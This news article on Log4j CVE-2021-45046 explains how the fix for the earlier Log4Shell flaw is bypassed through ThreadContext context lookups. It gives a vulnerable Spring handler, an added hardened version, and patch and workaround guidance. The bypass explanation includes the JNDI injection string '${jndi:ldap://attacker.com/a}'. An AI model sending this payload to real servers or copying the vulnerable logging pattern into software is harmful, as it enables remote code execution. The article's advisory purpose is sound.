Another vulnerability has been identified in the implementation of JNDI lookups in the Log4j 2 library (CVE-2021-45046). It manifests despite the fix added in release 2.15 and despite the use of the "log4j2.noFormatMsgLookup" setting for protection. The problem is especially dangerous for older Log4j 2 versions that are protected only by the "noFormatMsgLookup" flag, because it makes it possible to bypass the protection against the previous vulnerability (Log4Shell, CVE-2021-44228), which allows an attacker to execute their code on the server. For users of version 2.15, exploitation is limited to crashing the application through exhaustion of available resources.
The vulnerability appears only on systems that use Context Lookups for logging, such as ${ctx:loginId}, or MDC (Thread Context Map) patterns, such as %X, %mdc, and %MDC. The attack comes down to creating the conditions for data containing a JNDI substitution to be written to the log, when context queries or MDC patterns are used in an application that defines its own rules for formatting log output.
Researchers from LunaSec noted that for Log4j versions below 2.15, this vulnerability can be used as a new vector for a Log4Shell attack leading to code execution, if ThreadContext expressions that include external data are used in the log output, regardless of whether the protective "noMsgFormatLookups" flag or the "%m{nolookups}" pattern is set.

The protection bypass comes down to the fact that, instead of substituting "${jndi:ldap://attacker.com/a}" directly, this expression is substituted through the value of an intermediate variable used in the rules for formatting log output. For example, if the context query ${ctx:apiversion} is used when writing to the log, the attack can be carried out by placing the string "${jndi:ldap://attacker.com/a}" into the value written to the apiversion variable. Example of vulnerable code:

    appender.console.layout.pattern = ${ctx:apiversion} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n

    @GetMapping("/")
    public String index(@RequestHeader("X-Api-Version") String apiVersion) {
        // The value of the HTTP header "X-Api-Version" is passed into ThreadContext unchanged
        ThreadContext.put("apiversion", apiVersion);
        // When this line is written to the log, the external value is processed through the ${ctx:apiversion} substitution in the layout pattern
        logger.info("Received a request for API version");
        return "Hello, world!";
    }

In Log4j version 2.15, the vulnerability can be used for a DoS attack by passing values to ThreadContext that cause an infinite loop while the output formatting pattern is being processed.
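A hardened counterpart to the handler above, added here as an illustration and not taken from the article or from any project: it allowlists the header value before it can reach the context map behind ${ctx:apiversion}, clears the map after the request, and adds a self-check for the JndiLookup removal workaround. The class name ApiVersionController, the version format, and jndiLookupPresent() are assumptions; Spring Boot and Log4j 2 are assumed to be on the classpath.

```java
import java.util.regex.Pattern;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.ThreadContext;
import org.springframework.web.bind.annotation.GetMapping;
import org.springframework.web.bind.annotation.RequestHeader;
import org.springframework.web.bind.annotation.RestController;

@RestController
public class ApiVersionController {
    private static final Logger logger = LogManager.getLogger(ApiVersionController.class);

    // Allowlist (assumed format): "1", "2.3" or "10.4.1". Anything else, including
    // "${jndi:...}" or a nested "${ctx:...}", is rejected before it reaches
    // ThreadContext and therefore before the layout resolves ${ctx:apiversion}.
    private static final Pattern API_VERSION = Pattern.compile("^[0-9]{1,3}(\\.[0-9]{1,3}){0,2}$");

    static String sanitizeApiVersion(String raw) {
        if (raw == null || !API_VERSION.matcher(raw).matches()) {
            return "invalid"; // constant placeholder, never the client-supplied text
        }
        return raw;
    }

    @GetMapping("/")
    public String index(@RequestHeader(value = "X-Api-Version", required = false) String apiVersion) {
        // Only the validated value enters the map consulted by ${ctx:apiversion} / %X{apiversion}.
        ThreadContext.put("apiversion", sanitizeApiVersion(apiVersion));
        try {
            logger.info("Received a request for API version");
            return "Hello, world!";
        } finally {
            ThreadContext.remove("apiversion"); // do not leak the value into the next request on this thread
        }
    }

    // Self-check for the workaround described in the article: after removing
    // JndiLookup.class from log4j-core, this must return false. Input validation
    // is defence in depth only; the real fix is updating to 2.16 / 2.12.2.
    static boolean jndiLookupPresent() {
        try {
            Class.forName("org.apache.logging.log4j.core.lookup.JndiLookup");
            return true;
        } catch (ClassNotFoundException e) {
            return false;
        }
    }
}
```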

To block the vulnerability, updates 2.16 and 2.12.2 have been published. In the Log4j 2.16 branch, in addition to the fix applied in version 2.15 and the restriction of JNDI LDAP requests to "localhost", JNDI functionality is completely disabled by default and support for message substitution patterns has been removed. As a workaround, it is recommended to remove the JndiLookup class from the classpath (for example, "zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class").
You can track the availability of fixes in packages on the distribution pages (Debian, Ubuntu, RHEL, SUSE, Fedora, Arch) and from Java platform vendors (GitHub, Docker, Oracle, VMware, Broadcom, Amazon/AWS, Juniper, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, etc.).
Source: opennet.ru
